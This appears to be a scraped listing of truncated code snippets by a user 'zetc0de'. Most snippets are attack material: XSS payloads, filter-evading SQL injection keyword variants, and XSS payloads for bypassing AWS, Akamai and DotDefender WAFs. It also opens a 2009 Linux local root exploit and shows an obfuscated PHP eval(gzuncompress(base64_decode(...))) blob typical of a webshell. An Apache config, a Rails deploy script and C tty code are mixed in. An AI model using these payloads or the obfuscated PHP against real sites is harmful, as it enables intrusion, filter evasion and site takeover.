zetc0de

![xss" onload=alert(1);//](a)

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">

zetc0de

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

zetc0de

<VirtualHost *:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

zetc0de

#!/bin/bash -e
cd ~/sinaurails
./script/puma.sh stop
git status
git pull origin develop
bundle install
RAILS_ENV=staging bundle exec rake db:migrate
RAILS_ENV=staging bundle exec rake assets:clobber
RAILS_ENV=staging bundle exec rake assets:precompile
# wget https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css -P public/assets/.

zetc0de

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
int main() {
    int fd = open("/dev/tty", O_RDWR);
    if (fd < 0) {
        perror("open");
        return -1;
    }

zetc0de

#!/bin/bash
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique 
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket

zetc0de

#!/bin/bash

green='\e[0;34m'
red='\e[1;31m'
RESET="\033[00m" #normal

# if [[ $EUID -ne 0 ]]
# then
# echo -e "${red}This script must run as root!"
# echo -e "Bye...$RESET"

zetc0de

<?php eval(gzuncompress(base64_decode("eNrsvfeXo0iyKPzz23P2f2B1+25VX3UXRsi1mwEJOSQhgRyamVMHD8IKI4T27f/+ZYJsVbWbmZ573/de9UyVlCYiMjNcRibB3//2c6RFkeV7j1EshfH96/fI3//2s6rplqfd3wnMsPM4oWa9uzfI42OnP2QeH/MWr6QkNh8DKYqQj0iphjW0uqrgeE3V6ni1XsFqGE7IpI7JWoOQlFLeRfF929IeTT8JH7V9YIUa6EuQ7//+t7//zdLvozgM/Oj+1aPA8AuG/+WuN5tNHufg2yPVZcazu9/e3HV933C0u9fIPz5+RHTJiTTkNfIvANzUJFUL7/M+KP6AISRGImM/Rjp+4ql3Oc3a3ooBsn///W964ikxGDMShJYXD33D8u4hnJ8+QVo+mLHrfPoAQX76EFuxo326gfYBLQo/oHkT0CGKM/AdoLC8IIkBIFcKAcx32HtZUmwjhL3eKr7jh+/+Q9f197IfAmrf4cEeiXzHUpG8FPk3gPABPQP7IPtqBsGb+Kcr5OAbKAs+zUwNCbVtokWxpiJzfoh8+Am5zN6kN3mEy3f3GxgWkkoR4gEYOoSBgJHHphUhkRbutPDhAxoUIClVteC8SI6TvUGk20lEtDD0wxyS5imgJNZCgDg1LUdD4jCzPAOJfSQBayJ5CAMbt30lcTUvhuWm5Kmw4YXqE14zhL91P3QRV4tNX/0I+CCGZZKqhoA7P3346eNlYMXfR6HfHVOzOc/c/fbTpw+KBsn59KFYgDgLtI+QOVMw0YgnudrH/U1dlMiuFSM7yUm0j3d3YClPANATTrgUkCZQlK8DmHjIFqD4p8AMrrnpxNg5NMDSrlp9ysU9TgD8+1BS3dLDRXRev88Z34oiLQY9JqDRL3f7u99ev4YsDWoKSJdywPbIVfd//f1v1wwMqdGASIBiALAg6h6ifIPckPgGiS1Xu39dvq9h/wX/f0EyX79+XQwO/AdhXpHZ4ji2z/xyp7o5p

zetc0de

@vanshitmalhotra | Bypass AWS WAF -// 
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>

@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc 
<img  sr%00c=x o%00nerror=((pro%00mpt(1)))>

DotDefender WAF bypass by @0xInfection 
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

zetc0de

<?php
set_time_limit(0);
error_reporting(0);

if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>